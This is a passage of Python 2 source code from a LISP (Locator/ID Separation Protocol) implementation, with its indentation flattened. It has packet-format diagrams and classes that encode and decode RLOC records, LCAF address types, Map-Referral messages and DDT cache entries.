packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source.mask_len = self.source.host_mask_len()
self.dest.mask_len = self.dest.host_mask_len()
format_size = struct.calcsize("HHHH")
if (len(packet) < format_size): return(None)
s, d, l, c = struct.unpack("HHHH", packet[:format_size])
self.udp_sport = socket.ntohs(s)
self.udp_dport = socket.ntohs(d)
self.udp_length = socket.ntohs(l)
self.udp_checksum = socket.ntohs(c)
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is the structure of an RLOC record in a Map-Request, Map-Reply, and
# Map-Register's EID record.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# /| Priority | Weight | M Priority | M Weight |
# L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# o | Unused Flags |L|p|R| Loc-AFI |
# c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \| Locator |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# AFI-List LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 1 | Rsvd2 | 2 + 4 + 2 + 16 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 1 | IPv4 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv4 Address | AFI = 2 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Geo Coordinate LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 5 | Rsvd2 | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |U|N|E|A|M|R|K| Reserved | Location Uncertainty |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Lat Degrees | Latitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Long Degrees | Longitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Altitude |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Radius | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Explicit Locator Path (ELP) Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 10 | Rsvd2 | n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop k ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Replication List Entry Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 13 | Rsvd2 | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #1 RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #n RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Security Key Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 11 | Rsvd2 | 6 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Count | Rsvd3 |A| Cipher Suite| Rsvd4 |R|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Length | Public Key Material ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... Public Key Material |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Locator Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# JSON Data Model Type Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 14 | kid | Rvd2|E|B| Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | JSON length | JSON binary/text encoding ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Optional Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When the E-bit is set to 1, then the kid is key-id and indicates that
# value fields in JSON string are encrypted with the encryption key
# associated with key-id 'kid'.
#
class lisp_rloc_record():
def __init__(self):
self.priority = 0
self.weight = 0
self.mpriority = 0
self.mweight = 0
self.local_bit = False
self.probe_bit = False
self.reach_bit = False
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.rloc_name = None
self.keys = None
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def print_record(self, indent):
rloc_str = self.print_rloc_name()
if (rloc_str != ""): rloc_str = ", " + rloc_str
geo_str = ""
if (self.geo):
name = ""
if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
geo_str = ", geo: {}{}".format(name, self.geo.print_geo())
#endif
elp_str = ""
if (self.elp):
name = ""
if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))
#endif
rle_str = ""
if (self.rle):
name = ""
if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False,
True))
#endif
json_str = ""
if (self.json):
name = ""
if (self.json.json_name):
name = "'{}' ".format(self.json.json_name)
#endif
json_str = ", json: {}".format(self.json.print_json(False))
#endif
sec_str = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
sec_str = ", " + self.keys[1].print_keys()
#endif
line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}")
lprint(line.format(indent, self.print_flags(), self.priority,
self.weight, self.mpriority, self.mweight, self.rloc.afi,
red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
elp_str, rle_str, json_str, sec_str))
#enddef
def print_flags(self):
return("{}{}{}".format("L" if self.local_bit else "l", "P" \
if self.probe_bit else "p", "R" if self.reach_bit else "r"))
#enddef
def store_rloc_entry(self, rloc_entry):
rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
else rloc_entry.translated_rloc
self.rloc.copy_address(rloc)
if (rloc_entry.rloc_name):
self.rloc_name = rloc_entry.rloc_name
#endif
if (rloc_entry.geo):
self.geo = rloc_entry.geo
else:
name = rloc_entry.geo_name
if (name and lisp_geo_list.has_key(name)):
self.geo = lisp_geo_list[name]
#endif
#endif
if (rloc_entry.elp):
self.elp = rloc_entry.elp
else:
name = rloc_entry.elp_name
if (name and lisp_elp_list.has_key(name)):
self.elp = lisp_elp_list[name]
#endif
#endif
if (rloc_entry.rle):
self.rle = rloc_entry.rle
else:
name = rloc_entry.rle_name
if (name and lisp_rle_list.has_key(name)):
self.rle = lisp_rle_list[name]
#endif
#endif
if (rloc_entry.json):
self.json = rloc_entry.json
else:
name = rloc_entry.json_name
if (name and lisp_json_list.has_key(name)):
self.json = lisp_json_list[name]
#endif
#endif
self.priority = rloc_entry.priority
self.weight = rloc_entry.weight
self.mpriority = rloc_entry.mpriority
self.mweight = rloc_entry.mweight
#enddef
def encode_json(self, lisp_json):
json_string = lisp_json.json_string
kid = 0
if (lisp_json.json_encrypted):
kid = (lisp_json.json_key_id << 5) | 0x02
#endif
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
addr_len = self.rloc.addr_length() + 2
lcaf_len = socket.htons(len(json_string) + addr_len)
json_len = socket.htons(len(json_string))
packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, kid,
lcaf_len, json_len)
packet += json_string
#
# If telemetry, store RLOC address in LCAF.
#
if (lisp_is_json_telemetry(json_string)):
packet += struct.pack("H", socket.htons(self.rloc.afi))
packet += self.rloc.pack_address()
else:
packet += struct.pack("H", 0)
#endif
return(packet)
#enddef
def encode_lcaf(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
gpkt = ""
if (self.geo):
gpkt = self.geo.encode_geo()
#endif
epkt = ""
if (self.elp):
elp_recs = ""
for elp_node in self.elp.elp_nodes:
afi = socket.htons(elp_node.address.afi)
flags = 0
if (elp_node.eid): flags |= 0x4
if (elp_node.probe): flags |= 0x2
if (elp_node.strict): flags |= 0x1
flags = socket.htons(flags)
elp_recs += struct.pack("HH", flags, afi)
elp_recs += elp_node.address.pack_address()
#endfor
elp_len = socket.htons(len(elp_recs))
epkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_ELP_TYPE,
0, elp_len)
epkt += elp_recs
#endif
rpkt = ""
if (self.rle):
rle_recs = ""
for rle_node in self.rle.rle_nodes:
afi = socket.htons(rle_node.address.afi)
rle_recs += struct.pack("HBBH", 0, 0, rle_node.level, afi)
rle_recs += rle_node.address.pack_address()
if (rle_node.rloc_name):
rle_recs += struct.pack("H", socket.htons(LISP_AFI_NAME))
rle_recs += rle_node.rloc_name + "\0"
#endif
#endfor
rle_len = socket.htons(len(rle_recs))
rpkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_RLE_TYPE,
0, rle_len)
rpkt += rle_recs
#endif
jpkt = ""
if (self.json):
jpkt = self.encode_json(self.json)
#endif
spkt = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
spkt = self.keys[1].encode_lcaf(self.rloc)
#endif
npkt = ""
if (self.rloc_name):
npkt += struct.pack("H", socket.htons(LISP_AFI_NAME))
npkt += self.rloc_name + "\0"
#endif
apkt_len = len(gpkt) + len(epkt) + len(rpkt) + len(spkt) + 2 + \
len(jpkt) + self.rloc.addr_length() + len(npkt)
apkt_len = socket.htons(apkt_len)
apkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_AFI_LIST_TYPE,
0, apkt_len, socket.htons(self.rloc.afi))
apkt += self.rloc.pack_address()
return(apkt + npkt + gpkt + epkt + rpkt + spkt + jpkt)
#enddef
def encode(self):
flags = 0
if (self.local_bit): flags |= 0x0004
if (self.probe_bit): flags |= 0x0002
if (self.reach_bit): flags |= 0x0001
packet = struct.pack("BBBBHH", self.priority, self.weight,
self.mpriority, self.mweight, socket.htons(flags),
socket.htons(self.rloc.afi))
if (self.geo or self.elp or self.rle or self.keys or self.rloc_name \
or self.json):
packet = packet[0:-2] + self.encode_lcaf()
else:
packet += self.rloc.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, nonce, ms_json_encrypt):
packet_format = "HBBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
#
# Process AFI-List LCAF.
#
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
while (lcaf_len > 0):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
packet_len = len(packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF):
packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
if (packet == None): return(None)
else:
packet = packet[format_size::]
self.rloc_name = None
if (afi == LISP_AFI_NAME):
packet, rloc_name = lisp_decode_dist_name(packet)
self.rloc_name = rloc_name
else:
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
#endif
lcaf_len -= packet_len - len(packet)
#endwhile
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
#
# Process Geo-Coordinate LCAF.
#
geo = lisp_geo("")
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
if (packet == None): return(None)
self.geo = geo
elif (lcaf_type == LISP_LCAF_JSON_TYPE):
encrypted_json = rsvd2 & 0x02
#
# Process JSON LCAF.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
json_len = struct.unpack(packet_format, packet[:format_size])[0]
json_len = socket.ntohs(json_len)
if (lcaf_len < format_size + json_len): return(None)
packet = packet[format_size::]
self.json = lisp_json("", packet[0:json_len], encrypted_json,
ms_json_encrypt)
packet = packet[json_len::]
#
# If telemetry, store RLOC address in LCAF.
#
afi = socket.ntohs(struct.unpack("H", packet[:2])[0])
packet = packet[2::]
if (afi != 0 and lisp_is_json_telemetry(self.json.json_string)):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
#endif
elif (lcaf_type == LISP_LCAF_ELP_TYPE):
#
# Process ELP LCAF.
#
elp = lisp_elp(None)
elp.elp_nodes = []
while (lcaf_len > 0):
flags, afi = struct.unpack("HH", packet[:4])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
elp_node = lisp_elp_node()
elp.elp_nodes.append(elp_node)
flags = socket.ntohs(flags)
elp_node.eid = (flags & 0x4)
elp_node.probe = (flags & 0x2)
elp_node.strict = (flags & 0x1)
elp_node.address.afi = afi
elp_node.address.mask_len = elp_node.address.host_mask_len()
packet = elp_node.address.unpack_address(packet[4::])
lcaf_len -= elp_node.address.addr_length() + 4
#endwhile
elp.select_elp_node()
self.elp = elp
elif (lcaf_type == LISP_LCAF_RLE_TYPE):
#
# Process RLE LCAF.
#
rle = lisp_rle(None)
rle.rle_nodes = []
while (lcaf_len > 0):
x, y, level, afi = struct.unpack("HBBH", packet[:6])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
rle_node = lisp_rle_node()
rle.rle_nodes.append(rle_node)
rle_node.level = level
rle_node.address.afi = afi
rle_node.address.mask_len = rle_node.address.host_mask_len()
packet = rle_node.address.unpack_address(packet[6::])
lcaf_len -= rle_node.address.addr_length() + 6
if (lcaf_len >= 2):
afi = struct.unpack("H", packet[:2])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[2::]
packet, rle_node.rloc_name = \
lisp_decode_dist_name(packet)
if (packet == None): return(None)
lcaf_len -= len(rle_node.rloc_name) + 1 + 2
#endif
#endif
#endwhile
self.rle = rle
self.rle.build_forwarding_list()
elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):
#
# Get lisp_key() data structure so we can parse keys in the Map-
# Reply RLOC-record. Then get the RLOC address.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, lcaf_len, False)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, lcaf_len, False)
if (packet == None): return(None)
if (len(packet) < 2): return(None)
afi = struct.unpack("H", packet[:2])[0]
self.rloc.afi = socket.ntohs(afi)
if (len(packet) < self.rloc.addr_length()): return(None)
packet = self.rloc.unpack_address(packet[2::])
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#
# Some RLOC records may not have RLOC addresses but other LCAF
# types. Don't process security keys because we need RLOC addresses
# to index into security data structures.
#
if (self.rloc.is_null()): return(packet)
rloc_name_str = self.rloc_name
if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)
#
# If we found no stored key, store the newly created lisp_keys()
# to the RLOC list if and only if a remote public-key was supplied
# in the Map-Reply.
#
stored_key = self.keys[1] if self.keys else None
if (stored_key == None):
if (key.remote_public_key == None):
string = bold("No remote encap-public-key supplied", False)
lprint(" {} for {}".format(string, rloc_name_str))
key = None
else:
string = bold("New encap-keying with new state", False)
lprint(" {} for {}".format(string, rloc_name_str))
key.compute_shared_key("encap")
#endif
#endif
#
# If we have stored-key, the other side received the local public
# key that is stored in variable 'stored_key'. If the remote side
# did not supply a public-key, it doesn't want to do lisp-crypto.
# If it did supply a public key, check to see if the same as
# last time, and if so, do nothing, else we do a rekeying.
#
if (stored_key):
if (key.remote_public_key == None):
key = None
remote = bold("Remote encap-unkeying occurred", False)
lprint(" {} for {}".format(remote, rloc_name_str))
elif (stored_key.compare_keys(key)):
key = stored_key
lprint(" Maintain stored encap-keys for {}".format( \
rloc_name_str))
else:
if (stored_key.remote_public_key == None):
string = "New encap-keying for existing state"
else:
string = "Remote encap-rekeying"
#endif
lprint(" {} for {}".format(bold(string, False),
rloc_name_str))
stored_key.remote_public_key = key.remote_public_key
stored_key.compute_shared_key("encap")
key = stored_key
#endif
#endif
self.keys = [None, key, None, None]
else:
#
# All other LCAFs we skip over and ignore.
#
packet = packet[lcaf_len::]
#endif
return(packet)
#enddef
def decode(self, packet, nonce, ms_json_encrypt=False):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.priority, self.weight, self.mpriority, self.mweight, flags, \
afi = struct.unpack(packet_format, packet[:format_size])
flags = socket.ntohs(flags)
afi = socket.ntohs(afi)
self.local_bit = True if (flags & 0x0004) else False
self.probe_bit = True if (flags & 0x0002) else False
self.reach_bit = True if (flags & 0x0001) else False
if (afi == LISP_AFI_LCAF):
packet = packet[format_size-2::]
packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
else:
self.rloc.afi = afi
packet = packet[format_size::]
packet = self.rloc.unpack_address(packet)
#endif
self.rloc.mask_len = self.rloc.host_mask_len()
return(packet)
#enddef
def end_of_rlocs(self, packet, rloc_count):
for i in range(rloc_count):
packet = self.decode(packet, None, False)
if (packet == None): return(None)
#endfor
return(packet)
#enddef
#endclass
#
# Map-Referral Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=6 | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Referral Count| EID mask-len | ACT |A|I| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c |SigCnt | Map Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix ... |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |R| Loc/LCAF-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator ... |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_referral():
def __init__(self):
self.record_count = 0
self.nonce = 0
#enddef
def print_map_referral(self):
lprint("{} -> record-count: {}, nonce: 0x{}".format( \
bold("Map-Referral", False), self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is a DDT cache type data structure that holds information configured
# in the "lisp ddt-authoritative-prefix" and "lisp delegate" commands. The
# self.delegatione_set[] is a list of lisp_ddt_node()s.
#
class lisp_ddt_entry():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.delegation_set = []
self.source_cache = None
self.map_referrals_sent = 0
#enddef
def is_auth_prefix(self):
if (len(self.delegation_set) != 0): return(False)
if (self.is_star_g()): return(False)
return(True)
#enddef
def is_ms_peer_entry(self):
if (len(self.delegation_set) == 0): return(False)
return(self.delegation_set[0].is_ms_peer())
#enddef
def print_referral_type(self):
if (len(self.delegation_set) == 0): return("unknown")
ddt_node = self.delegation_set[0]
return(ddt_node.print_node_type())
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_ddt_cache.add_cache(self.eid, self)
else:
ddt = lisp_ddt_cache.lookup_cache(self.group, True)
if (ddt == None):
ddt = lisp_ddt_entry()
ddt.eid.copy_address(self.group)
ddt.group.copy_address(self.group)
lisp_ddt_cache.add_cache(self.group, ddt)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ddt.group)
ddt.add_source_entry(self)
#endif
#enddef
def add_source_entry(self, source_ddt):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ddt.eid, source_ddt)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
#endclass
class lisp_ddt_node():
def __init__(self):
self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.map_server_peer = False
self.map_server_child = False
self.priority = 0
self.weight = 0
#enddef
def print_node_type(self):
if (self.is_ddt_child()): return("ddt-child")
if (self.is_ms_child()): return("map-server-child")
if (self.is_ms_peer()): return("map-server-peer")
#enddef
def is_ddt_child(self):
if (self.map_server_child): return(False)
if (self.map_server_peer): return(False)
return(True)
#enddef
def is_ms_child(self):
return(self.map_server_child)
#enddef
def is_ms_peer(self):
return(self.map_server_peer)
#enddef
#endclass
#
# This is a Map-Request queue used on a Map-Resolver when waiting for a
# Map-Referral to be retunred by a DDT-node or a Map-Server.
#
class lisp_ddt_map_request():
def __init__(self, lisp_sockets, packet, eid, group, nonce):
self.uptime = lisp_get_timestamp()
self.lisp_sockets = lisp_sockets
self.packet = packet
self.eid = eid
self.group = group
self.nonce = nonce
self.mr_source = None
self.sport = 0
self.itr = None
self.retry_count = 0
self.send_count = 0
